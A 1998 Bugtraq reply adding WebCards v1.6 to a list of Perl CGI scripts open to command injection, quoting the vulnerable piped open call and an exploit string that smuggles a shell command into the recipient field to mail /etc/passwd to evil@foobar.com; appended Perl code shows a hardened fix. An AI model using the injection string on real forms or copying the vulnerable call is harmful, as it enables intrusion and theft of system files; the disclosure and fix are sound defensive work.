[8485] in bugtraq
Re: Several new CGI vulnerabilities
daemon@ATHENA.MIT.EDU (Karl Hanmore)
Tue Nov 10 16:14:24 1998
Date: Tue, 10 Nov 1998 18:45:24 +1000
Reply-To: Karl Hanmore <avatar@ULTRA.ULTRA.NET.AU>
From: Karl Hanmore <avatar@ULTRA.ULTRA.NET.AU>
X-To: xnec <xnec@WINTERMUTE.LINUX.TC>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199811100026.SAA26763@wintermute.linux.tc>
G'day,
As a related note, the WebCards program (V1.6) by Sam Kareem
(webmaster@iraq.net) is subject to the same vulnerability.
Regards,
Karl
On Mon, 9 Nov 1998, xnec wrote:
> INFO:
> After looking over the perl-CGI scripts on www.cgi-resources.com,
> I've discovered vulnerabilities in the following:
>
-----Snip----8<-----------------
>
> EXPLOIT:
>
> Each of these is exploitable by inputting metacharacters into the
> recipient's email address. Each script calls something similar
> to:
>
> open( MAIL, "|$mailprog $email" )
> # this particular line is from the LakeWeb scripts
>
> The exploit strings are simple, something like
> &mail evil@foobar.com < /etc/passwd&@host.com will work for each script
> (the @host.com is necessary because some hosts check for "@" and ".")
> when placed in the Recipient Email field.
>
-----Snip-----8<---------------
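
The quoted `open( MAIL, "|$mailprog $email" )` hands the form field to `/bin/sh`. The following is an added example, not code from the original post or from any of the scripts' authors, showing one way to harden that call: the list form of a piped open (no shell), the recipient passed in the headers via `sendmail -t` rather than on the command line, and an allow-list check on the address. The mailer path and the names `valid_recipient` and `send_card` are assumptions for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumption: a sendmail-compatible binary lives here. -t reads recipients
# from the message headers; -oi stops a lone "." line from ending the message.
my $mailprog = '/usr/sbin/sendmail';

# Conservative allow-list for an address taken from a form field.
# Rejects shell metacharacters, whitespace and CR/LF (header injection).
sub valid_recipient {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9._+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/ ? 1 : 0;
}

# Hypothetical replacement for the script's mail routine.
sub send_card {
    my ($email, $body) = @_;
    die "rejected recipient\n" unless valid_recipient($email);

    # List-form piped open: Perl execs $mailprog directly, without /bin/sh,
    # so nothing in the arguments is interpreted as shell syntax.
    open(my $mail, '|-', $mailprog, '-t', '-oi')
        or die "cannot run $mailprog: $!\n";
    print {$mail} "To: $email\n";
    print {$mail} "Subject: You have a card\n\n";
    print {$mail} $body, "\n";
    close($mail) or die "mailer exited with status $?\n";
}

# Constructed sample inputs: an ordinary address and the string quoted above.
# Only the validator is exercised here, so no mail is sent.
for my $input ('friend@example.com',
               '&mail evil@foobar.com < /etc/passwd&@host.com') {
    printf "%-50s %s\n", $input,
        valid_recipient($input) ? 'accepted' : 'rejected';
}
```

A check that only looks for "@" and "." in the field, as the quoted post notes some hosts do, passes the second input; the anchored allow-list rejects it, and the list-form open keeps the shell out of the path even if validation is later loosened.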